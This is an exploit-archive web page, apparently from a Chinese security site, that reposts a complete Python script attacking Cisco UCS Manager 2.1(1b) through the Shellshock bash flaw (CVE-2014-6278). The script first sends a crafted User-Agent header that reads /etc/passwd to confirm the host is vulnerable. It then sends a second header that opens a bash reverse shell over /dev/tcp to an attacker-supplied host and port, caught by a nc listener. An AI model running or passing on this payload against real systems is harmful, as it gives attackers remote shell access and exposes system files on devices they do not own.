首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Cisco UCS Manager 2.1(1b) - Shellshock Exploit 来源：@thatchriseckert 作者：thatchriseckert 发布时间：2016-03-17   #!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ###############################################   import sys import requests import time    if len(sys.argv) < 4:     print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"     print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"     print "[*]"     print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"     print "[*] Listener: nc -lvp <port>"     print "\n"     sys.exit()   #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() ucs = sys.argv[1] url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" attackhost = sys.argv[2] revshellport = sys.argv[3] headers1 = {         'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'         } headers2 = {         "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'         }   def exploit():     try:         r = requests.get(url, headers=headers1, verify=False, timeout=5)     except Exception, e:         if 'timeout' in str(e):             print "[+] Success.  Enjoy your shell..."         else:             print "[-] Something is wrong..."             print "[-] Error: " + str(e)   def main():     try:         r = requests.get(url, headers=headers2, verify=False, timeout=3)         if r.content.startswith('\nroot:'):             print "[+] Host is vulnerable, spawning shell..."             time.sleep(3)             exploit()         else:             print "[-] Host is not vulnerable, quitting..."             sys.exit()     except Exception, e:         print "[-] Something is wrong..."         print "[-] Error: " + str(e)   if __name__ == "__main__":     main()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FreeBSD 10.2 amd64 Kernel - am ·Windows - Secondary Logon Stan ·Dropbear SSHD xauth Command In ·Internet Download Manager 6.25 ·Netwrix Auditor 7.1.322.0 Acti ·Sysax Multi Server 6.50 - HTTP ·OpenSSH 7.2p1 xauth Command In ·CCTV-DVR Remote Code Execution ·Internet Explorer - Read AV in ·OS X Kernel - Code Execution D ·Zortam Mp3 Media Studio 20.15 ·OS X Kernel - AppleKeyStore Us   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved